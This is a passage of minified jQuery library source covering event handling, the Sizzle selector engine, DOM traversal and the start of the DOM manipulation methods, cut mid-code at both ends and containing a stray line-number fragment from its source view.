f.Event(a,b);a&&a.type?(this.originalEvent=a,this.type=a.type,this.isDefaultPrevented=a.defaultPrevented||a.returnValue===!1||a.getPreventDefault&&a.getPreventDefault()?K:J):this.type=a,b&&f.extend(this,b),this.timeStamp=a&&a.timeStamp||f.now(),this[f.expando]=!0},f.Event.prototype={preventDefault:function(){this.isDefaultPrevented=K;var a=this.originalEvent;!a||(a.preventDefault?a.preventDefault():a.returnValue=!1)},stopPropagation:function(){this.isPropagationStopped=K;var a=this.originalEvent;!a||(a.stopPropagation&&a.stopPropagation(),a.cancelBubble=!0)},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=K,this.stopPropagation()},isDefaultPrevented:J,isPropagationStopped:J,isImmediatePropagationStopped:J},f.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(a,b){f.event.special[a]={delegateType:b,bindType:b,handle:function(a){var c=this,d=a.relatedTarget,e=a.handleObj,g=e.selector,h;if(!d||d!==c&&!f.contains(c,d))a.type=e.origType,h=e.handler.apply(this,arguments),a.type=b;return h}}}),f.support.submitBubbles||(f.event.special.submit={setup:function(){if(f.nodeName(this,"form"))return!1;f.event.add(this,"click._submit keypress._submit",function(a){var c=a.target,d=f.nodeName(c,"input")||f.nodeName(c,"button")?c.form:b;d&&!d._submit_attached&&(f.event.add(d,"submit._submit",function(a){a._submit_bubble=!0}),d._submit_attached=!0)})},postDispatch:function(a){a._submit_bubble&&(delete a._submit_bubble,this.parentNode&&!a.isTrigger&&f.event.simulate("submit",this.parentNode,a,!0))},teardown:function(){if(f.nodeName(this,"form"))return!1;f.event.remove(this,"._submit")}}),f.support.changeBubbles||(f.event.special.change={setup:function(){if(z.test(this.nodeName)){if(this.type==="checkbox"||this.type==="radio")f.event.add(this,"propertychange._change",function(a){a.originalEvent.propertyName==="checked"&&(this._just_changed=!0)}),f.event.add(this,"click._change",function(a){this._just_changed&&!a.isTrigger&&(this._just_changed=!1,f.event.simulate("change",this,a,!0))});return!1}f.event.add(this,"beforeactivate._change",function(a){var b=a.target;z.test(b.nodeName)&&!b._change_attached&&(f.event.add(b,"change._change",function(a){this.parentNode&&!a.isSimulated&&!a.isTrigger&&f.event.simulate("change",this.parentNode,a,!0)}),b._change_attached=!0)})},handle:function(a){var b=a.target;if(this!==b||a.isSimulated||a.isTrigger||b.type!=="radio"&&b.type!=="checkbox")return a.handleObj.handler.apply(this,arguments)},teardown:function(){f.event.remove(this,"._change");return z.test(this.nodeName)}}),f.support.focusinBubbles||f.each({focus:"focusin",blur:"focusout"},function(a,b){var d=0,e=function(a){f.event.simulate(b,a.target,f.event.fix(a),!0)};f.event.special[b]={setup:function(){d++===0&&c.addEventListener(a,e,!0)},teardown:function(){--d===0&&c.removeEventListener(a,e,!0)}}}),f.fn.extend({on:function(a,c,d,e,g){var h,i;if(typeof a=="object"){typeof c!="string"&&(d=d||c,c=b);for(i in a)this.on(i,c,d,a[i],g);return this}d==null&&e==null?(e=c,d=c=b):e==null&&(typeof c=="string"?(e=d,d=b):(e=d,d=c,c=b));if(e===!1)e=J;else if(!e)return this;g===1&&(h=e,e=function(a){f().off(a);return h.apply(this,arguments)},e.guid=h.guid||(h.guid=f.guid++));return this.each(function(){f.event.add(this,a,e,d,c)})},one:function(a,b,c,d){return this.on(a,b,c,d,1)},off:function(a,c,d){if(a&&a.preventDefault&&a.handleObj){var e=a.handleObj;f(a.delegateTarget).off(e.namespace?e.origType+"."+e.namespace:e.origType,e.selector,e.handler);return this}if(typeof a=="object"){for(var g in a)this.off(g,c,a[g]);return this}if(c===!1||typeof c=="function")d=c,c=b;d===!1&&(d=J);return this.each(function(){f.event.remove(this,a,d,c)})},bind:function(a,b,c){return this.on(a,null,b,c)},unbind:function(a,b){return this.off(a,null,b)},live:function(a,b,c){f(this.context).on(a,this.selector,b,c);return this},die:function(a,b){f(this.context).off(a,this.selector||"**",b);return this},delegate:function(a,b,c,d){return this.on(b,a,c,d)},undelegate:function(a,b,c){return arguments.length==1?this.off(a,"**"):this.off(b,a,c)},trigger:function(a,b){return this.each(function(){f.event.trigger(a,b,this)})},triggerHandler:function(a,b){if(this[0])return f.event.trigger(a,b,this[0],!0)},toggle:function(a){var b=arguments,c=a.guid||f.guid++,d=0,e=function(c){var e=(f._data(this,"lastToggle"+a.guid)||0)%d;f._data(this,"lastToggle"+a.guid,e+1),c.preventDefault();return b[e].apply(this,arguments)||!1};e.guid=c;while(d<b.length)b[d++].guid=c;return this.click(e)},hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)}}),f.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(a,b){f.fn[b]=function(a,c){c==null&&(c=a,a=null);return arguments.length>0?this.on(b,null,a,c):this.trigger(b)},f.attrFn&&(f.attrFn[b]=!0),C.test(b)&&(f.event.fixHooks[b]=f.event.keyHooks),D.test(b)&&(f.event.fixHooks[b]=f.event.mouseHooks)}),function(){function x(a,b,c,e,f,g){for(var h=0,i=e.length;h<i;h++){var j=e[h];if(j){var k=!1;j=j[a];while(j){if(j[d]===c){k=e[j.sizset];break}if(j.nodeType===1){g||(j[d]=c,j.sizset=h);if(typeof b!="string"){if(j===b){k=!0;break}}else if(m.filter(b,[j]).length>0){k=j;break}}j=j[a]}e[h]=k}}}function w(a,b,c,e,f,g){for(var h=0,i=e.length;h<i;h++){var j=e[h];if(j){var k=!1;j=j[a];while(j){if(j[d]===c){k=e[j.sizset];break}j.nodeType===1&&!g&&(j[d]=c,j.sizset=h);if(j.nodeName.toLowerCase()===b){k=j;break}j=j[a]}e[h]=k}}}var a=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^\[\]]*\]|['"][^'"]*['"]|[^\[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?((?:.|\r|\n)*)/g,d="sizcache"+(Math.random()+"").replace(".",""),e=0,g=Object.prototype.toString,h=!1,i=!0,j=/\\/g,k=/\r\n/g,l=/\W/;[0,0].sort(function(){i=!1;return 0});var m=function(b,d,e,f){e=e||[],d=d||c;var h=d;if(d.nodeType!==1&&d.nodeType!==9)return[];if(!b||typeof b!="string")return e;var i,j,k,l,n,q,r,t,u=!0,v=m.isXML(d),w=[],x=b;do{a.exec(""),i=a.exec(x);if(i){x=i[3],w.push(i[1]);if(i[2]){l=i[3];break}}}while(i);if(w.length>1&&p.exec(b))if(w.length===2&&o.relative[w[0]])j=y(w[0]+w[1],d,f);else{j=o.relative[w[0]]?[d]:m(w.shift(),d);while(w.length)b=w.shift(),o.relative[b]&&(b+=w.shift()),j=y(b,j,f)}else{!f&&w.length>1&&d.nodeType===9&&!v&&o.match.ID.test(w[0])&&!o.match.ID.test(w[w.length-1])&&(n=m.find(w.shift(),d,v),d=n.expr?m.filter(n.expr,n.set)[0]:n.set[0]);if(d){n=f?{expr:w.pop(),set:s(f)}:m.find(w.pop(),w.length===1&&(w[0]==="~"||w[0]==="+")&&d.parentNode?d.parentNode:d,v),j=n.expr?m.filter(n.expr,n.set):n.set,w.length>0?k=s(j):u=!1;while(w.length)q=w.pop(),r=q,o.relative[q]?r=w.pop():q="",r==null&&(r=d),o.relative[q](k,r,v)}else k=w=[]}k||(k=j),k||m.error(q||b);if(g.call(k)==="[object Array]")if(!u)e.push.apply(e,k);else if(d&&d.nodeType===1)for(t=0;k[t]!=null;t++)k[t]&&(k[t]===!0||k[t].nodeType===1&&m.contains(d,k[t]))&&e.push(j[t]);else for(t=0;k[t]!=null;t++)k[t]&&k[t].nodeType===1&&e.push(j[t]);else s(k,e);l&&(m(l,h,e,f),m.uniqueSort(e));return e};m.uniqueSort=function(a){if(u){h=i,a.sort(u);if(h)for(var b=1;b<a.length;b++)a[b]===a[b-1]&&a.splice(b--,1)}return a},m.matches=function(a,b){return m(a,null,null,b)},m.matchesSelector=function(a,b){return m(b,null,null,[a]).length>0},m.find=function(a,b,c){var d,e,f,g,h,i;if(!a)return[];for(e=0,f=o.order.length;e<f;e++){h=o.order[e];if(g=o.leftMatch[h].exec(a)){i=g[1],g.splice(1,1);if(i.substr(i.length-1)!=="\\"){g[1]=(g[1]||"").replace(j,""),d=o.find[h](g,b,c);if(d!=null){a=a.replace(o.match[h],"");break}}}}d||(d=typeof b.getElementsByTagName!="undefined"?b.getElementsByTagName("*"):[]);return{set:d,expr:a}},m.filter=function(a,c,d,e){var f,g,h,i,j,k,l,n,p,q=a,r=[],s=c,t=c&&c[0]&&m.isXML(c[0]);while(a&&c.length){for(h in o.filter)if((f=o.leftMatch[h].exec(a))!=null&&f[2]){k=o.filter[h],l=f[1],g=!1,f.splice(1,1);if(l.substr(l.length-1)==="\\")continue;s===r&&(r=[]);if(o.preFilter[h]){f=o.preFilter[h](f,s,d,r,e,t);if(!f)g=i=!0;else if(f===!0)continue}if(f)for(n=0;(j=s[n])!=null;n++)j&&(i=k(j,f,n,s),p=e^i,d&&i!=null?p?g=!0:s[n]=!1:p&&(r.push(j),g=!0));if(i!==b){d||(s=r),a=a.replace(o.match[h],"");if(!g)return[];break}}if(a===q)if(g==null)m.error(a);else break;q=a}return s},m.error=function(a){throw new Error("Syntax error, unrecognized expression: "+a)};var n=m.getText=function(a){var b,c,d=a.nodeType,e="";if(d){if(d===1||d===9||d===11){if(typeof a.textContent=="string")return a.textContent;if(typeof a.innerText=="string")return a.innerText.replace(k,"");for(a=a.firstChild;a;a=a.nextSibling)e+=n(a)}else if(d===3||d===4)return a.nodeValue}else for(b=0;c=a[b];b++)c.nodeType!==8&&(e+=n(c));return e},o=m.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF\-]|\\.)+)/,CLASS:/\.((?:[\w\u00c0-\uFFFF\-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF\-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF\-]|\\.)+)\s*(?:(\S?=)\s*(?:(['"])(.*?)\3|(#?(?:[\w\u00c0-\uFFFF\-]|\\.)*)|)|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*\-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\(\s*(even|odd|(?:[+\-]?\d+|(?:[+\-]?\d*)?n\s*(?:[+\-]\s*\d+)?))\s*\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^\-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF\-]|\\.)+)(?:\((['"]?)((?:\([^\)]+\)|[^\(\)]*)+)\2\))?/},leftMatch:{},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(a){return a.getAttribute("href")},type:function(a){return a.getAttribute("type")}},relative:{"+":function(a,b){var c=typeof b=="string",d=c&&!l.test(b),e=c&&!d;d&&(b=b.toLowerCase());for(var f=0,g=a.length,h;f<g;f++)if(h=a[f]){while((h=h.previousSibling)&&h.nodeType!==1);a[f]=e||h&&h.nodeName.toLowerCase()===b?h||!1:h===b}e&&m.filter(b,a,!0)},">":function(a,b){var c,d=typeof b=="string",e=0,f=a.length;if(d&&!l.test(b)){b=b.toLowerCase();for(;e<f;e++){c=a[e];if(c){var g=c.parentNode;a[e]=g.nodeName.toLowerCase()===b?g:!1}}}else{for(;e<f;e++)c=a[e],c&&(a[e]=d?c.parentNode:c.parentNode===b);d&&m.filter(b,a,!0)}},"":function(a,b,c){var d,f=e++,g=x;typeof b=="string"&&!l.test(b)&&(b=b.toLowerCase(),d=b,g=w),g("parentNode",b,f,a,d,c)},"~":function(a,b,c){var d,f=e++,g=x;typeof b=="string"&&!l.test(b)&&(b=b.toLowerCase(),d=b,g=w),g("previousSibling",b,f,a,d,c)}},find:{ID:function(a,b,c){if(typeof b.getElementById!="undefined"&&!c){var d=b.getElementById(a[1]);return d&&d.parentNode?[d]:[]}},NAME:function(a,b){if(typeof b.getElementsByName!="undefined"){var c=[],d=b.getElementsByName(a[1]);for(var e=0,f=d.length;e<f;e++)d[e].getAttribute("name")===a[1]&&c.push(d[e]);return c.length===0?null:c}},TAG:function(a,b){if(typeof b.getElementsByTagName!="undefined")return b.getElementsByTagName(a[1])}},preFilter:{CLASS:function(a,b,c,d,e,f){a=" "+a[1].replace(j,"")+" ";if(f)return a;for(var g=0,h;(h=b[g])!=null;g++)h&&(e^(h.className&&(" "+h.className+" ").replace(/[\t\n\r]/g," ").indexOf(a)>=0)?c||d.push(h):c&&(b[g]=!1));return!1},ID:function(a){return a[1].replace(j,"")},TAG:function(a,b){return a[1].replace(j,"").toLowerCase()},CHILD:function(a){if(a[1]==="nth"){a[2]||m.error(a[0]),a[2]=a[2].replace(/^\+|\s*/g,"");var b=/(-?)(\d*)(?:n([+\-]?\d*))?/.exec(a[2]==="even"&&"2n"||a[2]==="odd"&&"2n+1"||!/\D/.test(a[2])&&"0n+"+a[2]||a[2]);a[2]=b[1]+(b[2]||1)-0,a[3]=b[3]-0}else a[2]&&m.error(a[0]);a[0]=e++;return a},ATTR:function(a,b,c,d,e,f){var g=a[1]=a[1].replace(j,"");!f&&o.attrMap[g]&&(a[1]=o.attrMap[g]),a[4]=(a[4]||a[5]||"").replace(j,""),a[2]==="~="&&(a[4]=" "+a[4]+" ");return a},PSEUDO:function(b,c,d,e,f){if(b[1]==="not")if((a.exec(b[3])||"").length>1||/^\w/.test(b[3]))b[3]=m(b[3],null,null,c);else{var g=m.filter(b[3],c,d,!0^f);d||e.push.apply(e,g);return!1}else if(o.match.POS.test(b[0])||o.match.CHILD.test(b[0]))return!0;return b},POS:function(a){a.unshift(!0);return a}},filters:{enabled:function(a){return a.disabled===!1&&a.type!=="hidden"},disabled:function(a){return a.disabled===!0},checked:function(a){return a.checked===!0},selected:function(a){a.parentNode&&a.parentNode.selectedIndex;return a.selected===!0},parent:function(a){return!!a.firstChild},empty:function(a){return!a.firstChild},has:function(a,b,c){return!!m(c[3],a).length},header:function(a){return/h\d/i.test(a.nodeName)},text:function(a){var b=a.getAttribute("type"),c=a.type;return a.nodeName.toLowerCase()==="input"&&"text"===c&&(b===c||b===null)},radio:function(a){return a.nodeName.toLowerCase()==="input"&&"radio"===a.type},checkbox:function(a){return a.nodeName.toLowerCase()==="input"&&"checkbox"===a.type},file:function(a){return a.nodeName.toLowerCase()==="input"&&"file"===a.type},password:function(a){return a.nodeName.toLowerCase()==="input"&&"password"===a.type},submit:function(a){var b=a.nodeName.toLowerCase();return(b==="input"||b==="button")&&"submit"===a.type},image:function(a){return a.nodeName.toLowerCase()==="input"&&"image"===a.type},reset:function(a){var b=a.nodeName.toLowerCase();return(b==="input"||b==="button")&&"reset"===a.type},button:function(a){var b=a.nodeName.toLowerCase();return b==="input"&&"button"===a.type||b==="button"},input:function(a){return/input|select|textarea|button/i.test(a.nodeName)},focus:function(a){return a===a.ownerDocument.activeElement}},setFilters:{first:function(a,b){return b===0},last:function(a,b,c,d){return b===d.length-1},even:function(a,b){return b%2===0},odd:function(a,b){return b%2===1},lt:function(a,b,c){return b<c[3]-0},gt:function(a,b,c){return b>c[3]-0},nth:function(a,b,c){return c[3]-0===b},eq:function(a,b,c){return c[3]-0===b}},filter:{PSEUDO:function(a,b,c,d){var e=b[1],f=o.filters[e];if(f)return f(a,c,b,d);if(e==="contains")return(a.textContent||a.innerText||n([a])||"").indexOf(b[3])>=0;if(e==="not"){var g=b[3];for(var h=0,i=g.length;h<i;h++)if(g[h]===a)return!1;return!0}m.error(e)},CHILD:function(a,b){var c,e,f,g,h,i,j,k=b[1],l=a;switch(k){case"only":case"first":while(l=l.previousSibling)if(l.nodeType===1)return!1;if(k==="first")return!0;l=a;case"last":while(l=l.nextSibling)if(l.nodeType===1)return!1;return!0;case"nth":c=b[2],e=b[3];if(c===1&&e===0)return!0;f=b[0],g=a.parentNode;if(g&&(g[d]!==f||!a.nodeIndex)){i=0;for(l=g.firstChild;l;l=l.nextSibling)l.nodeType===1&&(l.nodeIndex=++i);g[d]=f}j=a.nodeIndex-e;return c===0?j===0:j%c===0&&j/c>=0}},ID:function(a,b){return a.nodeType===1&&a.getAttribute("id")===b},TAG:function(a,b){return b==="*"&&a.nodeType===1||!!a.nodeName&&a.nodeName.toLowerCase()===b},CLASS:function(a,b){return(" "+(a.className||a.getAttribute("class"))+" ").indexOf(b)>-1},ATTR:function(a,b){var c=b[1],d=m.attr?m.attr(a,c):o.attrHandle[c]?o.attrHandle[c](a):a[c]!=null?a[c]:a.getAttribute(c),e=d+"",f=b[2],g=b[4];return d==null?f==="!=":!f&&m.attr?d!=null:f==="="?e===g:f==="*="?e.indexOf(g)>=0:f==="~="?(" "+e+" ").indexOf(g)>=0:g?f==="!="?e!==g:f==="^="?e.indexOf(g)===0:f==="$="?e.substr(e.length-g.length)===g:f==="|="?e===g||e.substr(0,g.length+1)===g+"-":!1:e&&d!==!1},POS:function(a,b,c,d){var e=b[2],f=o.setFilters[e];if(f)return f(a,c,b,d)}}},p=o.match.POS,q=function(a,b){return"\\"+(b-0+1)};for(var r in o.match)o.match[r]=new RegExp(o.match[r].source+/(?![^\[]*\])(?![^\(]*\))/.source),o.leftMatch[r]=new RegExp(/(^(?:.|\r|\n)*?)/.source+o.match[r].source.replace(/\\(\d+)/g,q));o.match.globalPOS=p;var s=function(a,b){a=Array.prototype.slice.call(a,0);if(b){b.push.apply(b,a);return b}return a};try{Array.prototype.slice.call(c.documentElement.childNodes,0)[0].nodeType}catch(t){s=function(a,b){var c=0,d=b||[];if(g.call(a)==="[object Array]")Array.prototype.push.apply(d,a);else if(typeof a.length=="number")for(var e=a.length;c<e;c++)d.push(a[c]);else for(;a[c];c++)d.push(a[c]);return d}}var u,v;c.documentElement.compareDocumentPosition?u=function(a,b){if(a===b){h=!0;return 0}if(!a.compareDocumentPosition||!b.compareDocumentPosition)return a.compareDocumentPosition?-1:1;return a.compareDocumentPosition(b)&4?-1:1}:(u=function(a,b){if(a===b){h=!0;return 0}if(a.sourceIndex&&b.sourceIndex)return a.sourceIndex-b.sourceIndex;var c,d,e=[],f=[],g=a.parentNode,i=b.parentNode,j=g;if(g===i)return v(a,b);if(!g)return-1;if(!i)return 1;while(j)e.unshift(j),j=j.parentNode;j=i;while(j)f.unshift(j),j=j.parentNode;c=e.length,d=f.length;for(var k=0;k<c&&k<d;k++)if(e[k]!==f[k])return v(e[k],f[k]);return k===c?v(a,f[k],-1):v(e[k],b,1)},v=function(a,b,c){if(a===b)return c;var d=a.nextSibling;while(d){if(d===b)return-1;d=d.nextSibling}return 1}),function(){var a=c.createElement("div"),d="script"+(new Date).getTime(),e=c.documentElement;a.innerHTML="<a name='"+d+"'/>",e.insertBefore(a,e.firstChild),c.getElementById(d)&&(o.find.ID=function(a,c,d){if(typeof c.getElementById!="undefined"&&!d){var e=c.getElementById(a[1]);return e?e.id===a[1]||typeof e.getAttributeNode!="undefined"&&e.getAttributeNode("id").nodeValue===a[1]?[e]:b:[]}},o.filter.ID=function(a,b){var c=typeof a.getAttributeNode!="undefined"&&a.getAttributeNode("id");return a.nodeType===1&&c&&c.nodeValue===b}),e.removeChild(a),e=a=null}(),function(){var a=c.createElement("div");a.appendChild(c.createComment("")),a.getElementsByTagName("*").length>0&&(o.find.TAG=function(a,b){var c=b.getElementsByTagName(a[1]);if(a[1]==="*"){var d=[];for(var e=0;c[e];e++)c[e].nodeType===1&&d.push(c[e]);c=d}return c}),a.innerHTML="<a href='#'></a>",a.firstChild&&typeof a.firstChild.getAttribute!="undefined"&&a.firstChild.getAttribute("href")!=="#"&&(o.attrHandle.href=function(a){return a.getAttribute("href",2)}),a=null}(),c.querySelectorAll&&function(){var a=m,b=c.createElement("div"),d="__sizzle__";b.innerHTML="<p class='TEST'></p>";if(!b.querySelectorAll||b.querySelectorAll(".TEST").length!==0){m=function(b,e,f,g){e=e||c;if(!g&&!m.isXML(e)){var h=/^(\w+$)|^\.([\w\-]+$)|^#([\w\-]+$)/.exec(b);if(h&&(e.nodeType===1||e.nodeType===9)){if(h[1])return s(e.getElementsByTagName(b),f);if(h[2]&&o.find.CLASS&&e.getElementsByClassName)return s(e.getElementsByClassName(h[2]),f)}if(e.nodeType===9){if(b==="body"&&e.body)return s([e.body],f);if(h&&h[3]){var i=e.getElementById(h[3]);if(!i||!i.parentNode)return s([],f);if(i.id===h[3])return s([i],f)}try{return s(e.querySelectorAll(b),f)}catch(j){}}else if(e.nodeType===1&&e.nodeName.toLowerCase()!=="object"){var k=e,l=e.getAttribute("id"),n=l||d,p=e.parentNode,q=/^\s*[+~]/.test(b);l?n=n.replace(/'/g,"\\$&"):e.setAttribute("id",n),q&&p&&(e=e.parentNode);try{if(!q||p)return s(e.querySelectorAll("[id='"+n+"'] "+b),f)}catch(r){}finally{l||k.removeAttribute("id")}}}return a(b,e,f,g)};for(var e in a)m[e]=a[e];b=null}}(),function(){var a=c.documentElement,b=a.matchesSelector||a.mozMatchesSelector||a.webkitMatchesSelector||a.msMatchesSelector;if(b){var d=!b.call(c.createElement("div"),"div"),e=!1;try{b.call(c.documentElement,"[test!='']:sizzle")}catch(f){e=!0}m.matchesSelector=function(a,c){c=c.replace(/\=\s*([^'"\]]*)\s*\]/g,"='$1']");if(!m.isXML(a))try{if(e||!o.match.PSEUDO.test(c)&&!/!=/.test(c)){var f=b.call(a,c);if(f||!d||a.document&&a.document.nodeType!==11)return f}}catch(g){}return m(c,null,null,[a]).length>0}}}(),function(){var a=c.createElement("div");a.innerHTML="<div class='test e'></div><div class='test'></div>";if(!!a.getElementsByClassName&&a.getElementsByClassName("e").length!==0){a.lastChild.className="e";if(a.getElementsByClassName("e").length===1)return;o.order.splice(1,0,"CLASS"),o.find.CLASS=function(a,b,c){if(typeof b.getElementsByClassName!="undefined"&&!c)return b.getElementsByClassName(a[1])},a=null}}(),c.documentElement.contains?m.contains=function(a,b){return a!==b&&(a.contains?a.contains(b):!0)}:c.documentElement.compareDocumentPosition?m.contains=function(a,b){return!!(a.compareDocumentPosition(b)&16)}:m.contains=function(){return!1},m.isXML=function(a){var b=(a?a.ownerDocument||a:0).documentElement;return b?b.nodeName!=="HTML":!1};var y=function(a,b,c){var d,e=[],f="",g=b.nodeType?[b]:b;while(d=o.match.PSEUDO.exec(a))f+=d[0],a=a.replace(o.match.PSEUDO,"");a=o.relative[a]?a+"*":a;for(var h=0,i=g.length;h<i;h++)m(a,g[h],e,c);return m.filter(f,e)};m.attr=f.attr,m.selectors.attrMap={},f.find=m,f.expr=m.selectors,f.expr[":"]=f.expr.filters,f.unique=m.uniqueSort,f.text=m.getText,f.isXMLDoc=m.isXML,f.contains=m.contains}();var L=/Until$/,M=/^(?:parents|prevUntil|prevAll)/,N=/,/,O=/^.[^:#\[\.,]*$/,P=Array.prototype.slice,Q=f.expr.match.globalPOS,R={children:!0,contents:!0,next:!0,prev:!0};f.fn.extend({find:function(a){var b=this,c,d;if(typeof a!="string")return f(a).filter(function(){for(c=0,d=b.length;c<d;c++)if(f.contains(b[c],this))return!0});var e=this.pushStack("","find",a),g,h,i;for(c=0,d=this.length;c<d;c++){g=e.length,f.find(a,this[c],e);if(c>0)for(h=g;h<e.length;h++)for(i=0;i<g;i++)if(e[i]===e[h]){e.splice(h--,1);break}}return e},has:function(a){var b=f(a);return this.filter(function(){for(var a=0,c=b.length;a<c;a++)if(f.contains(this,b[a]))return!0})},not:function(a){return this.pushStack(T(this,a,!1),"not",a)},filter:function(a){return this.pushStack(T(this,a,!0),"filter",a)},is:function(a){return!!a&&(typeof a=="string"?Q.test(a)?f(a,this.context).index(this[0])>=0:f.filter(a,this).length>0:this.filter(a).length>0)},closest:function(a,b){var c=[],d,e,g=this[0];if(f.isArray(a)){var h=1;while(g&&g.ownerDocument&&g!==b){for(d=0;d<a.length;d++)f(g).is(a[d])&&c.push({selector:a[d],elem:g,level:h});g=g.parentNode,h++}return c}var i=Q.test(a)||typeof a!="string"?f(a,b||this.context):0;for(d=0,e=this.length;d<e;d++){g=this[d];while(g){if(i?i.index(g)>-1:f.find.matchesSelector(g,a)){c.push(g);break}g=g.parentNode;if(!g||!g.ownerDocument||g===b||g.nodeType===11)break}}c=c.length>1?f.unique(c):c;return this.pushStack(c,"closest",a)},index:function(a){if(!a)return this[0]&&this[0].parentNode?this.prevAll().length:-1;if(typeof a=="string")return f.inArray(this[0],f(a));return f.inArray(a.jquery?a[0]:a,this)},add:function(a,b){var c=typeof a=="string"?f(a,b):f.makeArray(a&&a.nodeType?[a]:a),d=f.merge(this.get(),c);return this.pushStack(S(c[0])||S(d[0])?d:f.unique(d))},andSelf:function(){return this.add(this.prevObject)}}),f.each({parent:function(a){var b=a.parentNode;return b&&b.nodeType!==11?b:null},parents:function(a){return f.dir(a,"parentNode")},parentsUntil:function(a,b,c){return f.dir(a,"parentNode",c)},next:function(a){return f.nth(a,2,"nextSibling")},prev:function(a){return f.nth(a,2,"previousSibling")},nextAll:function(a){return f.dir(a,"nextSibling")},prevAll:function(a){return f.dir(a,"previousSibling")},nextUntil:function(a,b,c){return f.dir(a,"nextSibling",c)},prevUntil:function(a,b,c){return f.dir(a,"previousSibling",c)},siblings:function(a){return f.sibling((a.parentNode||{}).firstChild,a)},children:function(a){return f.sibling(a.firstChild)},contents:function(a){return f.nodeName(a,"iframe")?a.contentDocument||a.contentWindow.document:f.makeArray(a.childNodes)}},function(a,b){f.fn[a]=function(c,d){var e=f.map(this,b,c);L.test(a)||(d=c),d&&typeof d=="string"&&(e=f.filter(d,e)),e=this.length>1&&!R[a]?f.unique(e):e,(this.length>1||N.test(d))&&M.test(a)&&(e=e.reverse());return this.pushStack(e,a,P.call(arguments).join(","))}}),f.extend({filter:function(a,b,c){c&&(a=":not("+a+")");return b.length===1?f.find.matchesSelector(b[0],a)?[b[0]]:[]:f.find.matches(a,b)},dir:function(a,c,d){var e=[],g=a[c];while(g&&g.nodeType!==9&&(d===b||g.nodeType!==1||!f(g).is(d)))g.nodeType===1&&e.push(g),g=g[c];return e},nth:function(a,b,c,d){b=b||1;var e=0;for(;a;a=a[c])if(a.nodeType===1&&++e===b)break;return a},sibling:function(a,b){var c=[];for(;a;a=a.nextSibling)a.nodeType===1&&a!==b&&c.push(a);return c}});var V="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",W=/ jQuery\d+="(?:\d+|null)"/g,X=/^\s+/,Y=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/ig,Z=/<([\w:]+)/,$=/<tbody/i,_=/<|&#?\w+;/,ba=/<(?:script|style)/i,bb=/<(?:script|object|embed|option|style)/i,bc=new RegExp("<(?:"+V+")[\\s/>]","i"),bd=/checked\s*(?:[^=]|=\s*.checked.)/i,be=/\/(java|ecma)script/i,bf=/^\s*<!(?:\[CDATA\[|\-\-)/,bg={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],area:[1,"<map>","</map>"],_default:[0,"",""]},bh=U(c);bg.optgroup=bg.option,bg.tbody=bg.tfoot=bg.colgroup=bg.caption=bg.thead,bg.th=bg.td,f.support.htmlSerialize||(bg._default=[1,"div<div>","</div>"]),f.fn.extend({text:function(a){return f.access(this,function(a){return a===b?f.text(this):this.empty().append((this[0]&&this[0].ownerDocument||c).createTextNode(a))},null,a,arguments.length)},wrapAll:function(a){if(f.isFunction(a))return this.each(function(b){f(this).wrapAll(a.call(this,b))});if(this[0]){var b=f(a,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&b.insertBefore(this[0]),b.map(function(){var a=this;while(a.firstChild&&a.firstChild.nodeType===1)a=a.firstChild;return a}).append(this)}return this},wrapInner:function(a){if(f.isFunction(a))return this.each(function(b){f(this).wrapInner(a.call(this,b))});return this.each(function(){var b=f(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){var b=f.isFunction(a);return this.each(function(c){f(this).wrapAll(b?a.call(this,c):a)})},unwrap:function(){return this.parent().each(function(){f.nodeName(this,"body")||f(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,!0,function(a){this.nodeType===1&&this.appendChild(a)})},prepend:function(){return this.domManip(arguments,!0,function(a){this.nodeType===1&&this.insertBefore(a,this.firstChild)})},before:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,!1,function(a){this.parentNode.insertBefore(a,this)});if(arguments.length){var a=f
|
4 |
+
.clean(arguments);a.push.apply(a,this.toArray());return this.pushStack(a,"before",arguments)}},after:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,!1,function(a){this.parentNode.insertBefore(a,this.nextSibling)});if(arguments.length){var a=this.pushStack(this,"after",arguments);a.push.apply(a,f.clean(arguments));return a}},remove:function(a,b){for(var c=0,d;(d=this[c])!=null;c++)if(!a||f.filter(a,[d]).length)!b&&d.nodeType===1&&(f.cleanData(d.getElementsByTagName("*")),f.cleanData([d])),d.parentNode&&d.parentNode.removeChild(d);return this},empty:function(){for(var a=0,b;(b=this[a])!=null;a++){b.nodeType===1&&f.cleanData(b.getElementsByTagName("*"));while(b.firstChild)b.removeChild(b.firstChild)}return this},clone:function(a,b){a=a==null?!1:a,b=b==null?a:b;return this.map(function(){return f.clone(this,a,b)})},html:function(a){return f.access(this,function(a){var c=this[0]||{},d=0,e=this.length;if(a===b)return c.nodeType===1?c.innerHTML.replace(W,""):null;if(typeof 